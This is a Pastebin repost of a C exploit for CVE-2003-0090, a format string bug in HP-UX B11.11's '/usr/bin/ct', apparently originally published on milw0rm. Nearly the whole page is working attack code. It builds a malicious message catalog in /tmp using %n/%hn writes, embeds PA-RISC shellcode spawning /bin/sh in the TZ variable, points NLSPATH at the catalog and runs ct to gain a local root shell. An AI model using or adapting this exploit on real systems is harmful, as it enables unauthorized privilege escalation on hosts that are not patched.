Advertisement
FlyFar

HP-UX B11.11 - '/usr/bin/ct' Format String Privilege Escalation - CVE-2003-0090

Feb 23rd, 2024
1,544
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 2.95 KB | Cybersecurity | 0 0
  1. /*******************************************************************************
  2. *  File    : x_hp-ux11i_nls_ct.c
  3. *  Usage   : cc x_hp-ux11i_nls_ct.c -o x_ct ; ./x_ct
  4. *  Purpose : Get a local rootshell from /usr/bin/ct,using HP-UX location language format string bug.
  5. *  Author  : watercloud xfocus org
  6. *  Tested  : On HP-UX B11.11 .
  7. ******************************************************************************/
  8.  
  9.  
  10. #include<stdio.h>
  11.  
  12. #define PATH "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin"
  13. #define TERM "TERM=xterm"
  14. #define NLSPATH "NLSPATH=/tmp/.ex.cat"
  15.  
  16. #define CMD  "/usr/bin/ct abc_ "
  17. #define MSG "\$set 1\n1128 "
  18. #define PRT_ARG_NUM 2    
  19. #define STACK_LEN 0x180  
  20.  
  21. #define ENV_BEGIN 0x40  
  22. #define ENV_LEN   0x40  
  23. #define LOW_STACK 0x210  
  24.  
  25. char buffer[512];
  26. char buff[72]=
  27.   "\x0b\x5a\x02\x9a\x34\x16\x03\xe8\x20\x20\x08\x01\xe4\x20\xe0\x08"
  28.   "\x96\xd6\x04\x16\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22"
  29.   "\x0f\x40\x12\x0e\x20\x20\x08\x01\xe4\x20\xe0\x08\xb4\x16\x70\x16"
  30.   "/bin/shA";
  31. int * pint = (int *) &buff[56];
  32. unsigned int haddr = 0;      
  33. unsigned int dstaddr = 0;    
  34.  
  35. int main(argc,argv,env)
  36. int argc;char ** argv;char **env;
  37. {
  38.     unsigned int * pa = (unsigned int*)env;
  39.     FILE * fp = NULL;
  40.     int xnum = (LOW_STACK - ENV_BEGIN + STACK_LEN -56 -12 -36 -PRT_ARG_NUM*4)/4;  
  41.  
  42.     int alig1= ENV_BEGIN - xnum*8;
  43.     int alig2=0;
  44.     int i=0;
  45.  
  46.     while(*pa != NULL)    
  47.         *pa++=0;
  48.    
  49.     if(strlen(CMD) >ENV_BEGIN-3)
  50.     {
  51.         printf("No enough space to alig our env!\n");
  52.         exit(1);
  53.     }
  54.  
  55.     printf("Exploite for HP-UX 11i NLS format bug by command ct.\n");
  56.     printf("From watercloud@xfocus.org.  2003-1-4\n");
  57.     printf("   Site : http://www.xfocus.net (CN).\n");
  58.     printf("   Site : http://www.xfocus.org (EN).\n");
  59.  
  60.  
  61.     haddr = (unsigned int)&fp & 0xffff0000;
  62.     if(alig1 < 0)
  63.       alig1+=0x10000;
  64.     alig2 = (haddr >> 16) - alig1 -xnum*8 ;
  65.     if(alig2 < 0)
  66.       alig2+=0x10000;
  67.  
  68.     dstaddr= haddr+ LOW_STACK + STACK_LEN -24;  
  69.     *pint++=dstaddr;
  70.     *pint++=dstaddr;
  71.     *pint++=dstaddr;
  72.     *pint = 0;
  73.    
  74.     /* begin to make our .cat file */
  75.     fp = fopen("/tmp/.ex.k","w");
  76.     if(fp == NULL)
  77.     {
  78.       printf("open file : /tmp/.ex.k for write error.\n");
  79.       exit(1);
  80.     }
  81.     fprintf(fp,"%s",MSG);
  82.     for(;i<xnum;i++)
  83.       fprintf(fp,"%%.8x");
  84.     fprintf(fp,"%%.%ix%%n",alig1);
  85.     fprintf(fp,"%%.%ix%%hn",alig2);
  86.     fclose(fp);
  87.     fp = NULL;
  88.     system("/usr/bin/gencat /tmp/.ex.cat /tmp/.ex.k");
  89.     unlink("/tmp/.ex.k");
  90.  
  91.  
  92.     sprintf(buffer,"TZ=%*s%s%*s",ENV_BEGIN-3-strlen(CMD),"A",buff,ENV_BEGIN+ENV_LEN-strlen(buff),"B");
  93.     putenv(buffer);
  94.     putenv(PATH);
  95.     putenv(TERM);
  96.     putenv(NLSPATH);
  97.    
  98.     printf("¼ÇµÃɾ³ýÕâ¸öÁÙʱÎļþ(Remember to delete the  file): /tmp/.ex.cat .\n");
  99.     execl("/usr/bin/ct","/usr/bin/ct","abc_",0);   /* ºÃÏ·¿ªÊ¼ÁË £º£©  */
  100. }
  101.  
  102.  
  103. // milw0rm.com [2003-12-16]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement